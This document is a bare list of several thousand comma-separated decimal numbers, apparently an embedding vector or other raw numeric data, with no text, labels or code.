0.0012165552470833063, -0.002247296739369631, -0.0171369519084692, -0.0027626673690974712, -0.010363508015871048, -0.00017025638953782618, -0.007488651666790247, 0.016001032665371895, 0.01216555293649435, 0.0012744029518216848, 0.017768017947673798, -0.0246816985309124, 0.014402331784367561, -0.00046716423821635544, -0.02682732231914997, 0.0046663833782076836, 0.013876442797482014, -0.012249695137143135, -0.007818208076059818, -0.0015724065015092492, 0.028748568147420883, -0.023167138919234276, -0.02189098298549652, -0.004179059993475676, -0.0010324943577870727, 0.009353802539408207, 0.032927628606557846, 0.01702476292848587, -0.018539320677518845, -0.002208731370046735, -0.003996752202510834, -0.0002798164787236601, 0.01999778486788273, -0.02252204902470112, 0.009178506210446358, -0.007713030558079481, -0.020264234393835068, -0.005353544373065233, -0.017641805112361908, -0.00018296536291018128, 0.030543601140379906, 0.0133295189589262, 0.004126471467316151, 0.012200611643493176, 0.012600286863744259, 0.01107871625572443, -0.0032517435029149055, -0.01213049329817295, 0.0020912829786539078, 0.03500313684344292, 0.01745949685573578, 0.015187658369541168, 0.015958961099386215, 0.0017266670474782586, 0.00852640438824892, -0.016421742737293243, -0.02942170575261116, 0.0027749380096793175, -0.024120749905705452, 0.03222644329071045, 0.014500497840344906, 0.004340332467108965, 0.0060056461952626705, 0.016323577612638474, -0.020586779341101646, 0.037835922092199326, 0.00014275680587161332, 0.0007248495821841061, -0.0037197843194007874, 0.010503745637834072, -0.020446542650461197, -0.006605159025639296, -0.01921245828270912, -0.0011718547903001308, -0.008898032829165459, 0.028678450733423233, -0.003649665741249919, 0.012670405209064484, -0.005777760874480009, 0.002953740069642663, -0.020979443565011024, 0.007656935602426529, 0.005066058598458767, -0.015201682224869728, 0.0018651509890332818, 0.012817654758691788, -0.016029080376029015, -0.026280399411916733, 0.040893085300922394, -0.012011292390525341, -0.03132892772555351, 0.04111746326088905, -0.007804184686392546, -0.013567921705543995, 0.03727497160434723, 0.008484333753585815, 0.013322507031261921, 0.038172490894794464, 0.001418145839124918, 0.03477875515818596, 0.0096272649243474, -0.0058934567496180534, -0.0071450709365308285, 0.023503707721829414, 0.013750229962170124, -0.03472265973687172, -0.01947890780866146, -0.005925009958446026, 0.031160643324255943, 0.005563899874687195, -0.02964608557522297, -0.002240284811705351, -0.007088976446539164, -0.009164482355117798, 0.028496142476797104, 0.02658892050385475, 0.0049153040163218975, -0.02417684532701969, 0.0041825659573078156, 0.010580875910818577, -0.011632652021944523, 0.00733439065515995, -0.01959109678864479, -0.019030150026082993, 0.03259105980396271, 0.02484998293220997, 0.03705059364438057, -0.0060091521590948105, -0.018567368388175964, -0.004445510450750589, 0.0044279806315898895, 0.03416171297430992, -0.004119459539651871, -0.011899102479219437, -0.005669077392667532, 0.029029041528701782, -0.009164482355117798, 0.00030698737828060985, 0.0029940581880509853, -0.008848949335515499, 0.00014177075354382396, 0.01670221798121929, -0.0024576520081609488, -0.002089529996737838, -0.019282575696706772, -0.003048399928957224, -0.019170386716723442, 0.015426061116158962, -0.003171107266098261, 0.012992950156331062, 0.005504298955202103, -0.009564157575368881, -0.0016302542062476277, 0.014051739126443863, 0.006317673251032829, 0.00852640438824892, 0.0002232834667665884, -0.012417979538440704, -0.021203821524977684, 0.01716499961912632, -0.008351108990609646, -0.0045576998963952065, -0.007411521393805742, -0.011015609838068485, 0.007001328282058239, 0.02001180872321129, -0.011709783226251602, -0.006755913607776165, -0.003458593040704727, 0.0216525811702013, 0.018216775730252266, -0.015243752859532833, -0.011709783226251602, 0.005872420966625214, 0.0099077383056283, -0.010622946545481682, 0.0016162304673343897, -0.005858397111296654, -0.026546848937869072, -0.0026645015459507704, -0.018286895006895065, -0.0028029854875057936, -0.009865667670965195, -0.009164482355117798, 0.01490718498826027, -0.005995128303766251, -0.02252204902470112, 0.033320292830467224, 0.031076502054929733, 0.004105435684323311, 0.016323577612638474, 0.015412037260830402, -0.03867734223604202, 0.0058829388581216335, 0.004785584751516581, 0.009136435575783253, -0.012410967610776424, 0.015145587734878063, -0.0003093976993113756, 0.008926079608500004, 0.002108812564983964, -0.03640550374984741, 0.011317119002342224, -0.010005904361605644, 0.017992395907640457, 0.007278296165168285, 0.0020351882558315992, 0.022746428847312927, -0.008848949335515499, 0.01352585107088089, -0.013736206106841564, 0.006289626006036997, 0.0033797097858041525, 0.0012288260040804744, -0.012782595120370388, 0.005833855830132961, -0.009192530065774918, -0.012754547409713268, 0.018595416098833084, 0.0031500717159360647, 0.01942281424999237, -0.021512342616915703, 0.0266590379178524, 0.009423920884728432, -0.005174742545932531, 0.018160680308938026, 0.001551370951347053, 0.0012752794427797198, 0.00736945029348135, -0.009984868578612804, -0.0023051444441080093, -0.0007984739495441318, 0.011506439186632633, -0.02713584341108799, 0.0025488059036433697, 0.0076288883574306965, 0.00030786386923864484, 0.023293351754546165, 0.0026645015459507704, -0.012361884117126465, 0.003954681102186441, -0.006471933797001839, -0.0029467283748090267, 0.005451710429042578, 0.013925526291131973, -0.0017266670474782586, 0.022746428847312927, 0.015019373968243599, -0.016281506046652794, 0.004782078787684441, 0.015285824425518513, -0.00562700629234314, -0.005900468211621046, -0.007853267714381218, 0.02182086557149887, -0.018132634460926056, 0.030431412160396576, -0.023545779287815094, 0.014177952893078327, -0.004599770996719599, 0.002589124022051692, -0.03461047261953354, -0.011317119002342224, -0.021119680255651474, 0.004659371450543404, -0.01703878492116928, -0.004652359988540411, 0.009711407124996185, 0.00854042824357748, 0.005868915002793074, -0.023167138919234276, -0.008337085135281086, -0.008463297970592976, -0.007271284237504005, 0.0146687813103199, 0.005858397111296654, -0.013883454725146294, 0.009585193358361721, -0.02194707840681076, 0.03135697543621063, 0.004007270094007254, 0.018427131697535515, 0.01217957679182291, 0.006447392515838146, 0.012684429064393044, -0.0198855958878994, 0.0037197843194007874, 0.01945086009800434, 0.008021552115678787, 0.005346532445400953, -0.007285308092832565, 0.020362401381134987, 0.020642874762415886, -0.008231907151639462, 0.0033288737758994102, -0.011660699732601643, -0.007832231931388378, -0.006110823713243008, 0.007677971385419369, 0.008210871368646622, -0.00991475023329258, 0.004831161815673113, 0.023615896701812744, -0.016001032665371895, 0.01931062340736389, -0.002627689391374588, 0.0069732810370624065, 0.03393733501434326, 0.00875078421086073, 0.006878620944917202, -0.005591947119683027, 0.02208731509745121, -0.01954902708530426, -0.013042033649981022, -0.00668930122628808, 0.004042329266667366, -0.0025610767770558596, -0.020362401381134987, -0.0013830866664648056, 0.009641287848353386, -0.0109314676374197, 0.011225965805351734, 0.014612686820328236, -0.008631582371890545, 0.012670405209064484, -0.01114182360470295, -0.007446580566465855, -0.02745838835835457, 0.016604050993919373, 0.010090046562254429, 0.023181162774562836, -0.0005017852527089417, -0.007684983313083649, -0.027921169996261597, 0.00872273650020361, -0.016688194125890732, 0.007790160831063986, 0.0064158388413488865, -0.011008597910404205, -0.014093810692429543, 0.011338154785335064, -0.015524227172136307, -0.00683304388076067, 0.0073904856108129025, 0.006605159025639296, 0.0027609143871814013, -0.01233383733779192, -0.00017573438526596874, -0.0024243458174169064, 0.01737535372376442, -0.021470272913575172, 0.01696866750717163, -0.013315495103597641, -0.00214562495239079, -0.0035129347816109657, 0.011275048367679119, 0.027598625048995018, 0.015369966626167297, 0.023321399465203285, 0.0016416484722867608, 0.0068961502984166145, 0.003195648780092597, -0.004603276960551739, -0.011359190568327904, -0.006068752612918615, -0.007839243859052658, -0.021021515130996704, 0.014374284073710442, 0.008638594299554825, 0.010475697927176952, -0.025102408602833748, -0.006643724162131548, 0.007039893418550491, -0.015089492313563824, -0.0004003325884696096, -0.006440380588173866, -0.000949228648096323, -0.027542531490325928, 0.007418532855808735, -0.006461415905505419, -0.0014865113189443946, -0.01247407402843237, -0.035507988184690475, -0.003290308639407158, 0.009536110796034336, 0.003539229277521372, -0.0005026616854593158, 0.006335202604532242, -0.014339225366711617, -0.015692511573433876, -0.03211425617337227, 0.01350481528788805, -0.0008068005554378033, 0.013827360235154629, 0.012929843738675117, 0.012831677682697773, 0.006875114981085062, -0.008273977786302567, 0.004690925125032663, 0.008056610822677612, 0.033572718501091, -0.003782890969887376, -0.014346237294375896, -0.001203408115543425, -0.00854042824357748, -0.023265304043889046, -0.002839797642081976, -0.00547274574637413, 0.00842122733592987, -0.0062966374680399895, 0.021021515130996704, -0.006938221398741007, 0.013028009794652462, -0.03166549652814865, 0.013315495103597641, 0.006528028752654791, 0.014269106090068817, -0.012558216229081154, -0.009851643815636635, 0.018539320677518845, 0.0269395112991333, -0.0168564785271883, 0.009115399792790413, -0.002229766920208931, 0.03629331290721893, 0.015987008810043335, 0.006401815451681614, -0.005314979236572981, 0.006107317749410868, 0.004235154949128628, -0.015089492313563824, 0.008799866773188114, 0.01126803644001484, 0.0008260831236839294, 0.00425969623029232, -0.02942170575261116, 0.006230025086551905, -0.0058864448219537735, -0.007222201209515333, -0.0038284678012132645, 0.00015447972691617906, -0.006394803524017334, 0.0032534964848309755, -0.002261320361867547, 0.010461674071848392, -0.006345720496028662, 0.020404471084475517, 0.03671402484178543, 0.0007940915529616177, -0.016281506046652794, -0.016547955572605133, -0.01768387481570244, 0.007965456694364548, 0.010454662144184113, 0.013427685014903545, -0.00855445209890604, -0.010566852055490017, 0.01126102451235056, 0.004757537506520748, -0.016561979427933693, -0.006107317749410868, 0.011169870384037495, 0.014935231767594814, 0.03682621568441391, -0.028061406686902046, 0.010349485091865063, -0.0003295567585155368, -0.0006464045727625489, -0.0016828430816531181, -0.022662285715341568, -0.0008659629966132343, 0.013119163922965527, -0.016323577612638474, -0.00871572457253933, -0.002361239166930318, -0.00868066493421793, 0.005546370055526495, -0.008014540188014507, -0.02911318466067314, -0.007481639739125967, -0.01959109678864479, -0.007102999836206436, 0.009423920884728432, 0.009494039230048656, 0.003188636852428317, 0.0053956154733896255, 0.01246706210076809, -0.017613757401704788, -0.010573863983154297, -0.028145549818873405, -0.014486473985016346, 0.018230799585580826, -0.030824074521660805, 0.0036356421187520027, -0.007474627811461687, 0.0019457872258499265, 0.020460566505789757, 0.00035124964779242873, -0.013974608853459358, 0.004683913197368383, -0.011527474969625473, 0.036012839525938034, -0.011001585982739925, -0.017641805112361908, 0.009227589704096317, -0.02463962696492672, 0.013729194179177284, 0.01114182360470295, 0.005321991164237261, 0.03432999923825264, 0.0017126434249803424, -0.030852122232317924, 0.00013114343164488673, 0.004929327871650457, -0.016477838158607483, 0.0018423625733703375, 0.0017617263365536928, -0.029057089239358902, 0.0023033914621919394, -0.003325368044897914, -0.01696866750717163, -0.011899102479219437, 0.0012691441224887967, 0.014823042787611485, 0.02900099568068981, -0.0011578310513868928, 0.018188728019595146, 0.007036387454718351, -0.000026047911887872033, -0.0024190868716686964, -0.004855703562498093, -0.007937409915030003, -0.01691257208585739, 0.013294460251927376, 0.023111043497920036, -0.010587887838482857, 0.014374284073710442, -0.006875114981085062, -0.015159610658884048, 0.005230837035924196, -0.012509133666753769, 0.0006117835873737931, -0.028566259890794754, 0.02710779570043087, -0.014949255622923374, 0.006931209936738014, 0.0023121561389416456, 0.031216738745570183, -0.0071380590088665485, 0.013925526291131973, 0.003898586379364133, 0.0019738345872610807, 0.025551166385412216, -0.005875926930457354, 0.022746428847312927, 0.013778277672827244, -0.0007774383993819356, 0.0053956154733896255, 0.033152006566524506, 0.015692511573433876, -0.007916374132037163, 0.000654292874969542, -0.013855407945811749, -0.00883492548018694, -0.013771265745162964, -0.004775067325681448, 0.01733328402042389, 0.00027609142125584185, 0.010209247469902039, -0.0044349925592541695, 0.0002506735036149621, -0.0026680072769522667, -0.008792854845523834, 0.00960622914135456, 0.030992358922958374, 0.015580321662127972, 0.01731926016509533, 0.03388123959302902, 0.01956305094063282, 0.003961693029850721, 0.023349447175860405, 0.0034691106993705034, -0.0036952428054064512, 0.013448720797896385, 0.01469682902097702, -0.025677379220724106, -0.01005498692393303, -0.003223696257919073, -0.00008523775613866746, -0.003909104038029909, -0.015664463862776756, 0.003192142816260457, 0.008000516332685947, 0.0001101078960346058, -0.0017143962904810905, -0.00872974842786789, -0.0010026940144598484, 0.020684946328401566, 0.006440380588173866, 0.009858655743300915, -0.015145587734878063, 0.025228621438145638, 0.021231869235634804, 0.026041995733976364, -0.035311657935380936, 0.015566297806799412, -0.031132595613598824, -0.006966269109398127, 0.011366202495992184, 0.01963316835463047, -0.0024190868716686964, 0.011520463041961193, 0.005174742545932531, 0.0047925966791808605, 0.009101375937461853, 0.00005045242141932249, -0.0035883120726794004, -0.00856146402657032, 0.007516698911786079, -0.010735136456787586, 0.009234600700438023, -0.023784181103110313, 0.016393695026636124, -0.015482155606150627, -0.0011490662582218647, 0.018791746348142624, 0.011962208896875381, -0.01228475384414196, -0.006591135170310736, 0.004375392105430365, -0.007593829184770584, -0.0297582745552063, -0.0007007463718764484, 0.0076218764297664165, 0.008337085135281086, -0.0076288883574306965, 0.021091632544994354, 0.0123408492654562, 0.001645154319703579, -0.016043104231357574, -0.013126175850629807, -0.006443886552006006, 0.0037338079418987036, 0.01351182721555233, 0.0019440342439338565, 0.005329003091901541, -0.0017485790885984898, -0.0068996562622487545, -0.009865667670965195, -0.008610546588897705, -0.016576003283262253, -0.025424953550100327, 0.014332213439047337, -0.003102741902694106, -0.007853267714381218, 0.013056057505309582, 0.004024799447506666, -0.009571169503033161, -0.00736945029348135, 0.01961914449930191, -0.0242609865963459, -0.0002375262847635895, -0.014921207912266254, 0.0010228530736640096, 0.006955751217901707, 0.020698970183730125, 0.02908513695001602, -0.0049188099801540375, -0.012663394212722778, -0.01768387481570244, -0.010433626361191273, -0.0007204671856015921, -0.019268551841378212, -0.015846772119402885, 0.011786913499236107, 0.008926079608500004, -0.023952465504407883, 0.01967523992061615, 0.0018143150955438614, -0.01768387481570244, -0.004087906330823898, -0.0026574896182864904, -0.006342214532196522, -0.0025856182910501957, -0.03163744881749153, -0.004210613667964935, -0.0032710260711610317, 0.02419086918234825, 0.01108572818338871, 0.012817654758691788, 0.0051537067629396915, -0.002624183427542448, 0.00280824420042336, 0.0269395112991333, 0.004024799447506666, -0.029926558956503868, -0.004855703562498093, 0.01486511342227459, 0.017739970237016678, 0.0028275270015001297, 0.003581300377845764, 0.000775247230194509, 0.0001335537526756525, 0.004564711824059486, 0.01940879039466381, 0.0031640955712646246, -0.014044727198779583, 0.010552828200161457, 0.010559840127825737, 0.01720706932246685, 0.0018143150955438614, -0.007790160831063986, -0.01670221798121929, 0.006100305821746588, 0.016407718881964684, -0.008477321825921535, 0.03250691667199135, 0.021330036222934723, 0.00684356177225709, -0.013995644636452198, 0.011758865788578987, 0.0018774217460304499, -0.0248920526355505, -0.012740524485707283, -0.013932538218796253, 0.010384543798863888, 0.02182086557149887, 0.016632098704576492, -0.007053917273879051, -0.02675720490515232, 0.005826843902468681, -0.01939476653933525, -0.033516623079776764, 0.012824666686356068, 0.033348340541124344, -0.01987157203257084, 0.004617300350219011, -0.003095729975029826, -0.00856146402657032, -0.009129423648118973, -0.005122153554111719, 0.00973244197666645, 0.004115953575819731, 0.0037197843194007874, 0.010026940144598484, -0.030992358922958374, -0.028397975489497185, 0.0025873712729662657, -0.022718381136655807, -0.015678487718105316, -0.0065350402146577835, 0.00684005580842495, 0.014935231767594814, -0.013441708870232105, 0.007243236992508173, -0.0067313723266124725, -0.00021681941871065646, 0.018721628934144974, 0.01932464726269245, 0.00841421540826559, -0.001900210278108716, -0.027612648904323578, -0.0028205150738358498, 0.0342739038169384, -0.008982175029814243, -0.018946006894111633, -0.00010517769260331988, -0.018258847296237946, 0.002008893759921193, 0.021484296768903732, -0.00107193598523736, 0.021007491275668144, 0.017950326204299927, -0.006117835640907288, -0.016113221645355225, -0.00684356177225709, -0.030431412160396576, -0.00682252598926425, 0.0056410301476716995, -0.003986234311014414, -0.008365131914615631, -0.011723806150257587, 0.010153152979910374, -0.005858397111296654, -0.01681440696120262, -0.02944975346326828, 0.01691257208585739, -0.007565781939774752, 0.029057089239358902, -0.01963316835463047, 0.007194153964519501, -0.01719304546713829, 0.01692659594118595, -0.0021035538520663977, -0.011162858456373215, -0.01963316835463047, -0.008119717240333557, 0.009690371342003345, 0.012116469442844391, -0.0007331761298701167, -0.01932464726269245, 0.023966489359736443, -0.016772335395216942, -0.011850019916892052, 0.007853267714381218, 0.00029011513106524944, 0.0027854559011757374, -0.010279365815222263, 0.03845296427607536, 0.003556758863851428, -0.020264234393835068, 0.024022584781050682, -0.00546573381870985, 0.006499981041997671, -0.00023314387362916023, -0.007222201209515333, 0.003775879042223096, -0.023770157247781754, -0.01752961426973343, -0.023812228813767433, -0.001996623119339347, -0.01352585107088089, -0.0030413882341235876, -0.012754547409713268, 0.0009097870206460357, 0.009269660338759422, -0.007691995240747929, 0.012046351097524166, 0.016618074849247932, -0.020488614216446877, -0.0025312763173133135, 0.018679557368159294, -0.008112706243991852, 0.00426320219412446, -0.002161401556804776, 0.004449016414582729, -0.005023987498134375, 0.009213565848767757, 0.0026609955821186304, -0.01977340504527092, -0.003104494884610176, -0.0014014927437528968, -0.002494464162737131, 0.012081410735845566, -0.002715337323024869, 0.008056610822677612, 0.0019229988101869822, -0.009220577776432037, -0.0011429309379309416, 0.009816584177315235, 0.015313871204853058, 0.003919621929526329, -0.006794478744268417, 0.0273602232336998, -0.014654758386313915, -0.0067313723266124725, -0.011997268535196781, 0.001055282773450017, 0.011583569459617138, -0.0036005829460918903, -0.01698269136250019, 0.009956820867955685, -0.016057128086686134, 0.020418494939804077, -0.00001062732917489484, 0.00872974842786789, 0.001648660283535719, 0.030094843357801437, 0.002247296739369631, -0.014654758386313915, -0.0039406572468578815, -0.01485108956694603, -0.0036251244600862265, 0.005998634267598391, -0.010693064890801907, -0.00001185303244710667, 0.004347344394773245, 0.004824149888008833, -0.011204930022358894, 0.012214635498821735, 0.01234786119312048, -0.005683101247996092, 0.011835996061563492, 0.00960622914135456, -0.0010438886238262057, 0.015327895060181618, -0.0044349925592541695, -0.0037197843194007874, 0.013862419873476028, 0.00972543004900217, -0.011162858456373215, 0.0023910393938422203, -0.0219330545514822, -0.017796065658330917, -0.0025786063633859158, -0.0024383694399148226, 0.018455179408192635, -0.0070153516717255116, -0.0033972393721342087, 0.028383951634168625, -0.009711407124996185, 0.006643724162131548, 0.01107871625572443, 0.01082629058510065, -0.0051607186906039715, -0.014135881327092648, 0.0055288407020270824, -0.0198154766112566, 0.014374284073710442, 0.010012916289269924, -0.026182232424616814, -0.007544746156781912, -0.006969775073230267, 0.015173634514212608, -0.0002140804281225428, -0.009963832795619965, 0.02719193883240223, 0.008014540188014507, 0.0022893676068633795, -0.005353544373065233, -0.010230283252894878, 0.003698748769238591, 0.030487505719065666, -0.015355942770838737, -0.012845701538026333, -0.03180573508143425, 0.0019194928463548422, 0.023293351754546165, -0.008603534661233425, -0.03149721026420593, -0.025677379220724106, -0.010258330963551998, -0.005052035208791494, -0.016421742737293243, -0.027752885594964027, -0.006044211331754923, -0.006384285632520914, 0.004761043470352888, 0.004322803113609552, -0.01932464726269245, -0.011380226351320744, -0.009676347486674786, -0.006734877824783325, 0.03376904875040054, -0.003870538901537657, 0.004210613667964935, 0.010272353887557983, -0.02678525075316429, -0.000775247230194509, 0.015790676698088646, -0.011282060295343399, 0.000415890128351748, 0.014486473985016346, 0.01082629058510065, -0.015383990481495857, 0.005655054003000259, -0.00429124990478158, 0.008512381464242935, 0.02001180872321129, -0.01703878492116928, -0.0010105823166668415, 0.021456249058246613, -0.012256707064807415, -0.000014133252079773229, 0.010461674071848392, 0.006717348471283913, -0.03183377906680107, 0.04274421185255051, -0.0034007453359663486, 0.02958999015390873, -0.013813336379826069, -0.00495737511664629, -0.00842122733592987, 0.005546370055526495, -0.002015905687585473, -0.01113481167703867, 0.0006196718895807862, -0.03444218635559082, 0.002831032732501626, -0.009220577776432037, 0.014346237294375896, -0.013764253817498684, 0.003674207255244255, -0.015580321662127972, -0.01973133534193039, 0.015103516168892384, 0.013013985939323902, 0.011807948350906372, 0.021245893090963364, -0.00840019155293703, -0.00990072637796402, 0.002746890764683485, 0.022606192156672478, -0.0036111006047576666, -0.007411521393805742, -0.010153152979910374, 0.012649370357394218, -0.014430378563702106, -0.005960069131106138, -0.010405579581856728, -0.01694061979651451, -0.0015873066149652004, 0.017838135361671448, -0.0025663357228040695, 0.003898586379364133, 0.0034778756089508533, -0.00871572457253933, 0.01931062340736389, -0.012908808887004852, 0.004136988893151283, 0.0031307891476899385, 0.004112447611987591, -0.0013646804727613926, -0.00993578601628542, -0.004662877414375544, -0.005350038409233093, 0.0008567599579691887, -0.0006700695375911891, 0.006605159025639296, -0.003325368044897914, -0.0243311058729887, 0.015201682224869728, -0.02182086557149887, 0.02692548930644989, 0.0071485769003629684, -0.028075430542230606, 0.018286895006895065, -0.003320109099149704, 0.014135881327092648, -0.00855445209890604, 0.0038565152790397406, 0.004438498523086309, 0.011190906167030334, 0.012838689610362053, -0.01922648213803768, -0.007811196614056826, -0.012978927232325077, -0.0022280141711235046, -0.015902867540717125, 0.021231869235634804, -0.014752923510968685, -0.03247886896133423, -0.001993117155507207, 0.0035076758358627558, 0.006086282432079315, 0.03231058642268181, -0.001528582419268787, -0.030599696561694145, -0.019170386716723442, 0.005420156754553318, -0.0099427979439497, -0.0031132595613598824, -0.018679557368159294, 0.008891020901501179, 0.005174742545932531, 0.0020930359605699778, 0.010496733710169792, -0.008365131914615631, -0.00036746455589309335, -0.005928515922278166, 0.004014282021671534, 0.007867291569709778, -0.003667195327579975, -0.007162600755691528, -0.0041895778849720955, 0.007544746156781912, 0.011906114406883717, -0.027991289272904396, 0.011366202495992184, -0.010167176835238934, -0.0011280307080596685, 0.009802560321986675, 0.00010676631063688546, -0.008617558516561985, -0.02253607288002968, 0.0006398309487849474, -0.007958444766700268, -0.01003395114094019, -0.001989611191675067, -0.0065420521423220634, 0.0038495033513754606, -0.006955751217901707, 0.006401815451681614, 0.0006512252148240805, 0.020446542650461197, 0.0266590379178524, 0.00613887095823884, 0.0033551682718098164, -0.0026294421404600143, 0.009108387865126133, -0.015482155606150627, -0.007169612683355808, -0.004505110904574394, 0.009178506210446358, 0.0005197530845180154, 0.009206553921103477, 0.0005166854243725538, 0.0009238107013516128, 0.007706018630415201, 0.013588957488536835, 0.001426910632289946, 0.006759419571608305, -0.0019212458282709122, -0.00682252598926425, 0.01354688685387373, 0.0122707299888134, -0.0037197843194007874, -0.003653171705082059, 0.010910432785749435, -0.016071150079369545, -0.0026557366363704205, 0.011225965805351734, 0.0242609865963459, -0.017880206927657127, 0.020769087597727776, -0.0025575708132237196, 0.00496789300814271, -0.006580617278814316, 0.01950695551931858, 0.000707319937646389, -0.010412591509521008, -0.02492010034620762, -0.018567368388175964, -0.013245376758277416, 0.02936561033129692, -0.014935231767594814, 0.005378085654228926, -0.017866183072328568, 0.024106726050376892, 0.013224341906607151, -0.013020997866988182, 0.0015662710648030043, 0.01092445570975542, -0.009297708049416542, -0.006065246649086475, -0.014430378563702106, -0.0037443258333951235, -0.0037232902832329273, -0.028832711279392242, -0.011800936423242092, -0.007670959457755089, -0.0037618554197251797, 0.005202789790928364, 0.006023175548762083, -0.005725172348320484, -0.031160643324255943, 0.0010973538737744093, -0.012193599715828896, 0.03486289829015732, 0.004466545768082142, 0.020432518795132637, 0.013020997866988182, 0.000477243767818436, 0.0011315366718918085, -0.0036952428054064512, 0.016646122559905052, -0.004725984297692776, -0.01499132625758648, -0.0010219765827059746, -0.004540170077234507, 0.008091670460999012, 0.015187658369541168, 0.013602981343865395, 0.006212495733052492, 0.0197453573346138, -0.013925526291131973, 0.01098055113106966, -0.028117502108216286, -0.012109458446502686, 0.0136450519785285, -0.012691440992057323, -0.008224895223975182, 0.0031833781395107508, -0.03130088001489639, 0.012263718992471695, 0.009648299776017666, -0.02503228932619095, 0.008351108990609646, -0.01987157203257084, 0.002589124022051692, -0.0085334163159132, 0.01696866750717163, -0.014794995076954365, 0.019198434427380562, 0.014640734530985355, -0.043164923787117004, -0.008316049352288246, 0.002384027699008584, 0.009066317230463028, 0.0017336788587272167, -0.030010700225830078, 0.02420489303767681, 0.0014961526030674577, 0.01695464365184307, -0.033180054277181625, 0.002720596268773079, -0.016758311539888382, -0.0001147094153566286, -0.0007550881709903479, 0.00012807574239559472, 0.02008192613720894, 0.011247000657022, 0.0018826806917786598, 0.02197512611746788, -0.009003209881484509, -0.0076218764297664165, 0.004056353121995926, -0.0018108092481270432, -0.003560264827683568, 0.0047996086068451405, -0.004820643924176693, -0.0021771781612187624, -0.014276118017733097, -0.006976786535233259, 0.006335202604532242, -0.012214635498821735, 0.010552828200161457, -0.00429475586861372, -0.0025803593453019857, 0.00734841451048851, -0.014977303333580494, 0.005027493461966515, -0.011786913499236107, -0.013939550146460533, 0.010517768561840057, -0.002366498112678528, -0.008112706243991852, 0.006868103053420782, 0.006054729223251343, -0.005854891613125801, -0.01966121606528759, -0.020039856433868408, -0.01109975203871727, -0.01346975564956665, 0.0001497686462244019, -0.008470309898257256, -0.007194153964519501, -0.004000258166342974, -0.023798204958438873, -0.007523710839450359, 0.014220023527741432, 0.009585193358361721, -0.025579214096069336, -0.011190906167030334, 0.0019878584425896406, 0.008463297970592976, -0.011478391475975513, -0.002256061416119337, -0.016688194125890732, 0.0038109382148832083, 0.016604050993919373, 0.0020790123380720615, 0.011015609838068485, 0.0027994795236736536, -0.005914492066949606, -0.009998892433941364, -0.003954681102186441, 0.023714063689112663, -0.006377273704856634, 0.0012384672882035375, 0.006261578295379877, -0.014374284073710442, 0.004855703562498093, 0.0218629352748394, 0.021330036222934723, 0.008330073207616806, -0.004129977431148291, -0.02925342135131359, 0.0024296045303344727, -0.0044349925592541695, -0.004575229715555906, -0.0025295233353972435, -0.0063667562790215015, -0.018188728019595146, 0.0027819499373435974, 0.0023962983395904303, 0.007124035619199276, 0.0009159223991446197, -0.0007095111650414765, -0.0001481252402300015, -0.004750525578856468, 0.006927703972905874, -0.0055218287743628025, 0.009529098868370056, 0.0024471343494951725, -0.011688747443258762, 0.007306343410164118, 0.00036856014048680663, -0.015159610658884048, -0.016239434480667114, -0.03362881392240524, -0.0017100139521062374, -0.006324685178697109, -0.004350850358605385, -0.01098055113106966, 0.006398309487849474, 0.0270096305757761, -0.0027503964956849813, -0.013813336379826069, -0.02215743251144886, -0.0075096869841217995, 0.004536664113402367, 0.010181200690567493, -0.026630990207195282, -0.009984868578612804, -0.03648964688181877, -0.020881276577711105, -0.011499427258968353, 0.016197364777326584, -0.0025330292992293835, 0.006521016824990511, 0.0018073032842949033, -0.014220023527741432, -0.018399083986878395, 0.002852068282663822, 0.021175775676965714, -0.0019545520190149546, 0.0026539836544543505, 0.005430674646049738, -0.006959257181733847, -0.014654758386313915, 0.01695464365184307, -0.007152082864195108, 0.020250210538506508, 0.0038424916565418243, -0.008266966789960861, 0.011387238278985023, 0.030683837831020355, 0.018118610605597496, 0.020586779341101646, 0.006787466816604137, 0.00858951173722744, 0.025817617774009705, 0.033067867159843445, 0.002846809569746256, -0.009409897029399872, -0.0020947889424860477, -0.011709783226251602, 0.0344141386449337, -0.00561999436467886, 0.0014391813892871141, 0.019268551841378212, 0.03158135339617729, -0.0041825659573078156, -0.013624017126858234, -0.010721112601459026, -0.0076218764297664165, 0.014191975817084312, 0.013567921705543995, -0.020979443565011024, 0.011702771298587322, -0.009346790611743927, -0.002601394895464182, 0.002571594435721636, -0.005581429228186607, 0.011814960278570652, -0.004568217787891626, -0.01469682902097702, 0.023714063689112663, 0.008470309898257256, 0.008245931006968021, -0.023629920557141304, -0.0249621719121933, 0.01745949685573578, -0.0008716601296328008, -0.01354688685387373, 0.0016092186560854316, -0.002592629985883832, -0.028804663568735123, -0.0014733641874045134, -0.01109975203871727, 0.023363471031188965, -0.0008672776748426259, -0.011583569459617138, 0.011618629097938538, 0.03662988170981407, 0.018609439954161644, -0.00868066493421793, -0.0036952428054064512, 0.0025505588855594397, -0.006026681512594223, 0.007769125513732433, 0.0024173338897526264, -0.025495072826743126, 0.005932021886110306, -0.001910728053189814, 0.011247000657022, 0.018693581223487854, 0.017978373914957047, 0.0000527257943758741, 0.005939033348113298, 0.012088422663509846, 0.015846772119402885, 0.011653687804937363, 0.004122965503484011, -0.004238660912960768, 0.013785289600491524, -0.017922278493642807, 0.0030361292883753777, -0.011590581387281418, -0.0006928580114617944, 0.015860795974731445, 0.022802522405982018, 0.0008050475735217333, 0.023531755432486534, 0.01950695551931858, -0.0173473060131073, 0.03225449100136757, -0.0009921762393787503, -0.013792300596833229, -0.0023068974260240793, 0.007530722767114639, 0.014458426274359226, -0.014198987744748592, 0.022606192156672478, -0.00546923978254199, -0.004035317339003086, 0.007600841112434864, 0.010286377742886543, 0.018132634460926056, 0.01348377950489521, 0.020797135308384895, -0.008820902556180954, 0.012628334574401379, -0.006363250315189362, 0.043080780655145645, -0.005851385649293661, -0.010896408930420876, 0.0033639331813901663, -0.01112779974937439, 0.030066795647144318, 0.03259105980396271, -0.00006086063149268739, -0.004207107704132795, -0.02724803425371647, -0.009437944740056992, 0.010566852055490017, -0.015089492313563824, 0.014135881327092648, -0.0011701018083840609, 0.0029116689693182707, -0.003870538901537657, -0.009578181430697441, -0.005946045275777578, 0.0016092186560854316, 0.0038389856927096844, 0.005830349866300821, 0.010188212618231773, 0.00549027556553483, 0.006812008563429117, 0.005588441155850887, -0.002361239166930318, -0.014416355639696121, 0.009473003447055817, 0.012628334574401379, 0.012628334574401379, -0.009066317230463028, -0.0029011513106524944, -0.00374783156439662, -0.013567921705543995, -0.0014102575369179249, -0.018286895006895065, -0.0147389005869627, -0.0058934567496180534, -0.02493412420153618, -0.01737535372376442, -0.002973022637888789, -0.01966121606528759, -0.02944975346326828, 0.0050415173172950745, 0.011920138262212276, -0.03231058642268181, 